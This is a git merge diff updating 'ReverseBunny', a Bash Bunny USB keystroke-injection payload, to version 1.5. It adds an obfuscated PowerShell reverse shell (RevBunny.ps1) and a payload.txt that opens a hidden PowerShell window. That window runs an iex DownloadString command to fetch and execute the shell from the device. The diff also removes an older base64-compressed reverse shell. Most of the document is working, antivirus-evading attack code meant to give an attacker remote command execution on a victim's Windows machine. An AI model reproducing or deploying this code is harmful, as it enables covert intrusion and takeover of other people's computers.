Merge pull request #578 from 0iphor13/master

Updated ReverseBunny to version 1.5
2025-10-29 16:58:25 +00:00 · 2023-02-23 09:27:07 -06:00 · 2023-02-23 09:27:07 -06:00 · 68f265cac3
commit 68f265cac3
parent 1c659bd4d4 1c166e2343
4 changed files with 60 additions and 40 deletions
--- a/payloads/library/remote_access/ReverseBunny/README.md
+++ b/payloads/library/remote_access/ReverseBunny/README.md
@ -1,17 +1,15 @@
-**Title:         ReverseBunny**
+**Title: ReverseBunny**

-Author:        0iphor13
-
-Version:       1.3
+<p>Author: 0iphor13<br>
+OS: Windows<br>
+Version: 1.5<br>


-<p>Getting remote access via obfuscated reverse shell.<br>
-Change the variables in payload.txt to your attacking maschine & start your listener. (for example netcat: nc -lvnp [PORT] )</p>
+<p>!Getting remote access via obfuscated reverse shell!<br>
+Upload payload.txt and RevBunny.ps1 onto your Bunny

-Whats new in version 1.3?
- Changed the whole payload
- Added custom shell design
+![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunny/RevBunny.png)

-Coming soon:
- Custom commands
- New evasion technique
+Change the variables in payload.txt to your attacking machine & start your listener. (for example netcat: nc -lvnp [PORT] )</p>
+
+A pressed CAPSLOCK key as also an indicator light on the bunny will indicate the payloads successfull execution
--- a/payloads/library/remote_access/ReverseBunny/RevBunny.png
+++ b/payloads/library/remote_access/ReverseBunny/RevBunny.png
--- a/payloads/library/remote_access/ReverseBunny/RevBunny.ps1
+++ b/payloads/library/remote_access/ReverseBunny/RevBunny.ps1
@ -0,0 +1,25 @@
+ .("{1}{0}" -f't','SE')  ("mAI"+"h")  ([tYpE]("{1}{0}"-F'Y','ArrA'))  ; &("{0}{3}{1}{2}"-f 'se','r','IABLe','t-vA')  eU92 ([TYPE]("{0}{1}" -F'sT','RiNG') );.("{0}{1}"-f 'S','et')  (("{1}{0}" -f 'W','f83')+'R'+'0')  (  [cHaR[ ]]" ))63]rahc[]GNirTs[,'Pou'(ECalPEr.)'\',)88]rahc[+27]rahc[+97]rahc[((ECalPEr.)93]rahc[]GNirTs[,'4EC'(ECalPEr.)'|',)711]rahc[+86]rahc[+76]rahc[((ECalPEr.)43]rahc[]GNirTs[,)28]rahc[+001]rahc[+911]rahc[((ECalPEr.)'
+
+
+TIXE;)(ESolC.cPou;'+'})(hSUlF.sPou;)hTGnEL.yPou,0,yPou(etIrW.sPou;)xPou(sETyBtEG.)IICSA::]gnidocne.txet[(='+'yPou;Rdw >Rdw+)'+'noitacoL-te'+'G(+Rdw SP@yn'+'nuBRdw+zPou=xPou;)GNirTS-'+'tUouDC1&>2 dPou Xei(=zPou;)iPo'+'u,0,bPou(gnIRtSteG.)gnidocnEIICSA.tXeT.MeTsYs EmaNepYT'+'- TCejBO-wEN(=dPou;{)0 en-)'+')hTgNeL.bP'+'ou,0,bPou(daER.sPou=iPou((eLIhw;}0{%uDC53556..0=bPou]][etyb[;)htgneL'+'.trA'+'ynnuBveRPou,0,trAynnuBveRPou(etirw.sPou;)(mAerTSteG.cPou=sPou;)PPou,IPou(tnE'+'IlCPCT.stEKcOS.tEN.mEtsYS tCEjBo-wEn=c'+'Pou
+)4EC}KCOLSPAC{4EC(syeKdneS.hswPo'+'u
+;)ynnubPou(setyBteG.IICSA::]gnidocnE'+'.txeT[ = trAynnuBveRPou
+llehS.tpircSW tcejbOmoC- tcejbO-we'+'N = hswPou
+;@Rdw
+
+...eunitnoc ot ]ret'+'nE[ sserP
+      
+/___uDC                                          31rohpi0  yB      '+'
+uDC /__  '+'                                       '+'                   
+uDC ,__XHOuDC_u'+'DC uDC_'+'uDC_uDC uDC_uDC_,__XHO /____XHO___XHO/___uDC  uDC_uDC___'+'XHO /_XHO uDC___XHO_'+'XHO uDC_XHO
+uDC uDC_uDC uDC uDC uDC uDC uD'+'C uDC uDC uDC_uDC'+' uDC /_uDC uDC'+'__  uDC __XHO  uDC uDC__  uDC V XHO/__  uDC XHOuDC uDC
+uDC u'+'DC uDC uDCXHO _4EC uDCXHO _4E'+'C uDC uDC uDC '+'uDC ___ uDC _ /uDC_'+'_ /__4EC uDC _ / / XHO XHO _ //    uDC
+ _   _  __ _  __ _ _   _/ /_uDC '+'uDC___  ___ __ _ _____   '+'_____/ /_uDC uDC
+                        XHO ___ uDC  '+'            '+'             XHO'+' _'+'__ uDC'+'
+                         ______'+'  '+'                          ______
+)Rdw(_)Rdw(		 
+  )=4EC.4EC=(		 
+  )/___XHO(		 
+
+Rdw@=ynnub'+'Pou'((xEI "  ) ; (  .("{1}{2}{0}" -f '-ITEM','G','Et') ('VAR'+'IABLe:'+'M'+'aiH')).vaLue::("{1}{0}"-f'se','reVer').Invoke(( &('Gi') (("{3}{2}{1}{0}" -f ':f','ABLE','RI','VA')+'83w'+'R0'))."v`AlUe" ) ;  (.("{0}{2}{1}"-f 'vA','E','RIaBl') eu92 -VaL)::("{0}{1}" -f'Joi','N').Invoke('' ,( &('Gi') (("{2}{1}{0}" -f':f','E','VARIABL')+'83w'+'R0'))."Val`Ue") |&("{1}{0}" -f 'EX','I')
+
--- a/payloads/library/remote_access/ReverseBunny/payload.txt
+++ b/payloads/library/remote_access/ReverseBunny/payload.txt
@ -1,47 +1,44 @@
 #!/bin/bash
 #
 # Title:         ReverseBunny
-# Description:   Get remote access using obfuscated powershell code - If caught by AV, feel free to contact me.
+# Description:   Get remote access, using an obfuscated powershell reverse shell.
 # Author:        0iphor13
-# Version:       1.3
+# Version:       1.5
 # Category:      Remote_Access
-# Attackmodes:   HID
+# Attackmodes:   HID, RNDIS_ETHERNET

 LED SETUP
+ATTACKMODE RNDIS_ETHERNET HID

-DUCKY_LANG de
+GET SWITCH_POSITION
+GET HOST_IP

-ATTACKMODE HID
+cd /root/udisk/payloads/$SWITCH_POSITION/

-#If needed, use this option
-#WAIT_FOR_PRESENT Your_Device
+# starting server
+LED SPECIAL

+# disallow outgoing dns requests so the server is accessible immediately
+iptables -A OUTPUT -p udp --dport 53 -j DROP
+python -m SimpleHTTPServer 80 &
+
+# wait until port is listening
+while ! nc -z localhost 80; do sleep 0.2; done
+
+#Opens hidden powershell instance
 Q DELAY 1500
 Q GUI r
 Q DELAY 500
-Q STRING "powershell -NoP -NonI -W hidden"
+Q STRING "powershell -NoP -NonI -w h"
 Q DELAY 500
 Q ENTER

-Q DELAY 250
-Q STRING "\$I='0.0.0.0';\$P=4444;&(\$SHellid[1]+\$shELlId[13]+'x')(NEw-ObJECt sYstem.iO.coMPRESsIOn.dEFLateSTReAm([sYstEM.I"
-Q DELAY 250
-Q STRING "o.MEmORyStReAm] [sYstEM.cOnvErT]::frOMBasE64sTrIng('jVJhb9owEP3c/IpT5A1HBUNXdR8apWqJPBSNUdSkWyuCogAWpAIHJa5K2vS/72yaqeoH"
-Q DELAY 250
-Q STRING "urN8nH3Pz88vkNmjlJV3aVsWHB3ROEmSrgNgFl6LtbxmYTsJTisxAQfiE4RVawTEBxg+QSBDnXSh29yz/8WRmHM6NQjd3Xf+ZT2RAaPbBX1LDIjEqoYWvh1R"
-Q DELAY 250
-Q STRING "9X6lueq30UJgk83QGmIsENWN4fe+0h2IzTFoNOhcw4ehd6wYc5zERm2MSFNhjW1NiknPfaNtOnWT9Q4yHPoKn4Umbhj6FUAv267y4uT0/xmMzDcGa1yIsoQJ"
-Q DELAY 250
-Q STRING "l0oUU1A5zHOpMvkoGGOWZV+6lkWG6Tpd+4+lyjfgwSQSO8W4nOeLTC6n5+dXoR8EbCBUv1KipMT8MR19cO5J/tTJ+w/cVxDel4pv2IgrFl7Pf3JVssgf"
-Q DELAY 250
-Q STRING "++sA76YkaJOx45LSI3NNFUaFuNpQvcOeikwJ+l5Fu9d+v2RDIZdq5biTGSqYTKdk5vUY+352dnpWf3npvbpPq2AoKCWZh3w3PF2gSk0yw6OjZbRynI4U0HN"
-Q DELAY 250
-Q STRING "eXLLw6AhFX/cfhB9BJ7rfilG64VDel5H4xSJxp5h5ceOAY/Sqm0Au31gzlP3s0UzcAVnAt4uvJ3V+qzr4pmw0wN7OI8/Hdl/bdDkOwT6myNAZ5vNUZbl02DZ"
-Q DELAY 250
-Q STRING "Vq2P7AmyXVB6dKO23+OA33srR8Iij4Ttj058i0DZVWkHFhlwO8F268WN9G66o8+qitf46Dzl1rL8='),[Io.COmpressIoN.coMPressiONmoDe]::decOMp"
-Q DELAY 250
-Q STRING "ReSS ) | %{ NEw-ObJECt  systEm.io.STREAmReadEr(\$_ , [sysTeM.TExt.encODIng]::AscIi)}| % {\$_.readTOeNd()} )"
-Q DELAY 250
-Q ENTER
+Q DELAY 500

+#Insert attacking IP & Port below
+Q STRING "\$I='0.0.0.0';\$P=4444;"
+Q DELAY 250
+Q STRING "iex (New-Object Net.WebClient).DownloadString(\"http://$HOST_IP/RevBunny.ps1\")"
+Q DELAY 400
+Q ENTER
 LED FINISH